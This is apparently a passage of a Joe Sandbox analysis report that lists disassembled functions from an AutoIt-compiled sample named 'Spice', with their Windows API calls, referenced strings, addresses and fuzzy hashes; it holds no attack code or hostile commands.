Opcode Fuzzy Hash: baa6dc63391f44c0e6504b2ca2a6f0afc9e87b2451540efeae7c4fe46eb9b701
Instruction Fuzzy Hash: 0C5128B1408748EBE320AF50EC86BAFBBF8FB84714F51885DF2D8511A1DB709529CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00EF8096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00EF8186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EF819B

Strings

', xrefs: 00EF80EF

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 1b7b75c39a173bff427eda21a472d8095c0278d79009cb4783670a0d92455586
Instruction ID: 7cb2bac828b08ffccebfb49bc56d79b98382b4f87c06f1fa603f17662db74da9
Opcode Fuzzy Hash: 1b7b75c39a173bff427eda21a472d8095c0278d79009cb4783670a0d92455586
Instruction Fuzzy Hash: 50410874A0130D9FDB14CF64C981BEA7BB5FB08304F50116AEA08EB351DB31A956CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00EE2C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EE2C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EE2CA0

Strings

|, xrefs: 00EE2C71

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: fa89b7489523151357cfeef660e3622da5a999a02be0cbab93e38e3cf3e54b90
Instruction ID: a2358bbd0b8ce43348cb804a1b881ef2469359b456d1f8679ea350a7f720705c
Opcode Fuzzy Hash: fa89b7489523151357cfeef660e3622da5a999a02be0cbab93e38e3cf3e54b90
Instruction Fuzzy Hash: 20311971C00219ABCF11EFA1DC85AEEBFB9FF08354F101059F919B6262EB315956DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EF7088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00EF713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EF7178

Strings

static, xrefs: 00EF70D8

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: d6cffbaf05d6b398f49f056066461c56747e15e849b3752d16eb198d459ae7eb
Instruction ID: 3fc680fcad689d7961cb778c2afcdecad3c42f1065f7323ab612ef660e5bec59
Opcode Fuzzy Hash: d6cffbaf05d6b398f49f056066461c56747e15e849b3752d16eb198d459ae7eb
Instruction Fuzzy Hash: 57318F71100608AEDB109F78CC80BFB77A9FF48724F10A619FAA9E7190DB31AC95D760

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ED30B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00ED30F3

Strings

0, xrefs: 00ED30B1

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: f17e20ae1b5d3c5409e8068359597f2c601e1b240513bdcefadff0faeea3625a
Instruction ID: 525f60144f50a4ebe5299985825cafa79ad8c6b1f413dcc0e253aad2c127cb76
Opcode Fuzzy Hash: f17e20ae1b5d3c5409e8068359597f2c601e1b240513bdcefadff0faeea3625a
Instruction Fuzzy Hash: CC31F73160130A9FEB249F64C885BAEBBF8EF05354F14501AE885B63A1D7709B41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EE40B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00EE4132

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

Strings

, $, xrefs: 00EE4172
AUTOITCALLVARIABLE%d, xrefs: 00EE4124

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 8e81e94660c5a892406b1f1f923739f5c289515cd81a7a831cc65acd28ba4b0c
Instruction ID: 7769b019921d37e643c5c44cb973b2bf50005ae4667fe7d1f4ac6b8523f5eddb
Opcode Fuzzy Hash: 8e81e94660c5a892406b1f1f923739f5c289515cd81a7a831cc65acd28ba4b0c
Instruction Fuzzy Hash: D221C571A0021CABCF14EF65D881EAE77F9EF54340F401498F908B7281DB30E946DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EF6CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EF6D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF6D91

Strings

Combobox, xrefs: 00EF6D53

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2489124a390b129b36834da428882b9ad8d9a65af902bf9c648522b974208b16
Instruction ID: e8bb62ee81adabec0026ca236b89a669670a7fe65eafc21bb7964707f6b36305
Opcode Fuzzy Hash: 2489124a390b129b36834da428882b9ad8d9a65af902bf9c648522b974208b16
Instruction Fuzzy Hash: 3F11867131020C7FEF11AE54DC81EFB3B6BEB84368F115125FA18AB291D6729C519760

Uniqueness

Uniqueness Score: -1.00%

Function 00EF722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00E72111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E7214F
Part of subcall function 00E72111: GetStockObject.GDI32(00000011), ref: 00E72163
Part of subcall function 00E72111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E7216D

GetWindowRect.USER32(00000000,?), ref: 00EF7296
GetSysColor.USER32(00000012), ref: 00EF72B0

Strings

static, xrefs: 00EF7273

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: e6a87a96f49a6197e09d2e6449e0904a719012821b9f63a640a9aac0b0f6b7f5
Instruction ID: 1fa5c201d19cd229dcd425902f1a11e6043743f94f4632173be6bdce3080eb74
Opcode Fuzzy Hash: e6a87a96f49a6197e09d2e6449e0904a719012821b9f63a640a9aac0b0f6b7f5
Instruction Fuzzy Hash: 0A21177261420AAFEB14DFA8CC45AFA7BA9FB08314F005519FE95E3250DA35E851AB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EF6F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00EF6FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EF6FD6

Strings

edit, xrefs: 00EF6FAB

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: ac1c56273976df35f5b89356752a3d2ee5a4427192f852b2cb51b81a5de2a442
Instruction ID: a5ddb45e109e0443a9c4246ab3b3dc1aaaf1b3800b27db78f8e0797a0eb51435
Opcode Fuzzy Hash: ac1c56273976df35f5b89356752a3d2ee5a4427192f852b2cb51b81a5de2a442
Instruction Fuzzy Hash: D511547260020CAFEB105E64EC44EFB3B6AEB15378F505714FA65A71D0CB75DC50A760

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ED31C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00ED31E8

Strings

0, xrefs: 00ED31BF

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 360cfaaf10d60ce64b57a8226717113bd4d47149910b7dc4dfa82e77ae1efd81
Instruction ID: 0e2ebba59117c13cf00c22ab4398129edd0ac220512d381e09fd1475d49c26a5
Opcode Fuzzy Hash: 360cfaaf10d60ce64b57a8226717113bd4d47149910b7dc4dfa82e77ae1efd81
Instruction Fuzzy Hash: 6F11297690221AEBDB20DAB8DC05B9D73B8EB45314F141123E801B7360D770AF0BDB92

Uniqueness

Uniqueness Score: -1.00%

Function 00EE28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EE28F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EE2921

Strings

<local>, xrefs: 00EE28E9

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: ce36ab16e35e5a76642e4c887d527495a3246b276bf95e182177750da4d6f33e
Instruction ID: b12139026c5e4e49566eed26b7363306b90b9cb2941a4dd62433322ff3dc1a8a
Opcode Fuzzy Hash: ce36ab16e35e5a76642e4c887d527495a3246b276bf95e182177750da4d6f33e
Instruction Fuzzy Hash: 3111C17050126EBAEB288E52CC89EF6FB6CFF05355F10612EF64566100E7706850E6E4

Uniqueness

Uniqueness Score: -1.00%

Function 00EE8475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00EE849D,?,00000000,?,?), ref: 00EE86F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00EE84A0
htons.WSOCK32(00000000,?,00000000), ref: 00EE84DD

Strings

255.255.255.255, xrefs: 00EE84B8

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 35697605cc99227ba1930ffca63bdc19ec1846c46c0f8eab4aa4e528cc8c751b
Instruction ID: 4434b00f2acc2fdeabfd347702eb46c5e2836df6b5d52a4e35486d8fa190e035
Opcode Fuzzy Hash: 35697605cc99227ba1930ffca63bdc19ec1846c46c0f8eab4aa4e528cc8c751b
Instruction Fuzzy Hash: 4611E53110024EABDB10AF64DD42FEEB364FF04314F10561AF929672C1DB71A800D755

Uniqueness

Uniqueness Score: -1.00%

Function 00EC99BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

Part of subcall function 00ECB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EC9A2B

Strings

ListBox, xrefs: 00EC99F5
ComboBox, xrefs: 00EC99CA

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: d67a018d4a6282964ea4151b753e7ce7b019beb48a70b84dc81f9106ee870548
Instruction ID: 69a7530324b49ca548d91f440431bbbbd0dfd2d23c3fba7af351901d22366501
Opcode Fuzzy Hash: d67a018d4a6282964ea4151b753e7ce7b019beb48a70b84dc81f9106ee870548
Instruction Fuzzy Hash: 6301F571A41124AB8B18FBA4CD56EFEB3ADAF52320B10174DF869732D2DE3298099751

Uniqueness

Uniqueness Score: -1.00%

Function 00ED934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00ED9367
__fread_nolock.LIBCMT ref: 00ED937C

Strings

EA06, xrefs: 00ED93AE

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 7ac461989b0dbabc8d5b1bdea6c27207a9ff63894f7b5c2915356333866dd510
Instruction ID: 6538934d78abf25a524232d6042a2081708a3b1bf4869eaa180ba68dda7a234f
Opcode Fuzzy Hash: 7ac461989b0dbabc8d5b1bdea6c27207a9ff63894f7b5c2915356333866dd510
Instruction Fuzzy Hash: 4001F9728042587EDF28CAA8CC56EFE7BF8DB15301F00419BF552E2281E575E6048760

Uniqueness

Uniqueness Score: -1.00%

Function 00EC98B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

Part of subcall function 00ECB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00EC9923

Strings

ListBox, xrefs: 00EC98ED
ComboBox, xrefs: 00EC98C2

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: c6cb12bdb73c821bedd1e1697b4c12e619ed2d17afa33e694b12525faf32cde8
Instruction ID: ac93555c2a906e0f73d527c81011a3de3363015107c64250b9172a24b9a254fa
Opcode Fuzzy Hash: c6cb12bdb73c821bedd1e1697b4c12e619ed2d17afa33e694b12525faf32cde8
Instruction Fuzzy Hash: 1E01D476A411086BCB18FBA0DA56FFFB3EC9F51300F14115DB80973292DA215E0997B2

Uniqueness

Uniqueness Score: -1.00%

Function 00EC993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

Part of subcall function 00ECB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 00EC99A6

Strings

ListBox, xrefs: 00EC9972
ComboBox, xrefs: 00EC9947

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 73623b7408ffa885a0217fb3fb0ce382ef80ec0444275b6edf73fae418d5d9b4
Instruction ID: 598bf75f7c0ea0eb3ef6c7b7925dc5f4320cbf071bd64226b6b12670a23b7931
Opcode Fuzzy Hash: 73623b7408ffa885a0217fb3fb0ce382ef80ec0444275b6edf73fae418d5d9b4
Instruction Fuzzy Hash: 8201F772A4110867CB14FBA0DA06FFFB3EC9F11340F14115DB84973282DE228E099672

Uniqueness

Uniqueness Score: -1.00%

Function 00ED54E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00ED5501
_wcscmp.LIBCMT ref: 00ED5513

Strings

#32770, xrefs: 00ED550D

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: d004eadce41d4f0c8dd72a2c245fe9075dc595462e144f76d683224ca28f42c5
Instruction ID: 5a302698dd9d1eebe8315fa0727df11ea83b8dc9c65fbb75df90a602a18b587a
Opcode Fuzzy Hash: d004eadce41d4f0c8dd72a2c245fe9075dc595462e144f76d683224ca28f42c5
Instruction Fuzzy Hash: B8E0223260032C2BD720AAA9AC09BABFBACEB04771F001017BC04E2051EA60AA0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 00EC8892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EC88A0

Part of subcall function 00E93588: _doexit.LIBCMT ref: 00E93592

Strings

Error allocating memory., xrefs: 00EC8899
AutoIt, xrefs: 00EC8894

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: b7305e7efc14857715788fc0494f7333342758a6d18d1361449a481d19c3a53f
Instruction ID: 3bbe3195ffab5f817d4845302dbf9e03a1872fb11a2dd69cb47f15620461f2b7
Opcode Fuzzy Hash: b7305e7efc14857715788fc0494f7333342758a6d18d1361449a481d19c3a53f
Instruction Fuzzy Hash: 25D05B7238536832D75472A47D0BFCA7A8C8B05B51F00542AFB0C755D34DE7C9D152E6

Uniqueness

Uniqueness Score: -1.00%

Function 00EAB4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00EAB544: _memset.LIBCMT ref: 00EAB551

Part of subcall function 00E90B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00EAB520,?,?,?,00E7100A), ref: 00E90B79

IsDebuggerPresent.KERNEL32(?,?,?,00E7100A), ref: 00EAB524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E7100A), ref: 00EAB533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EAB52E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
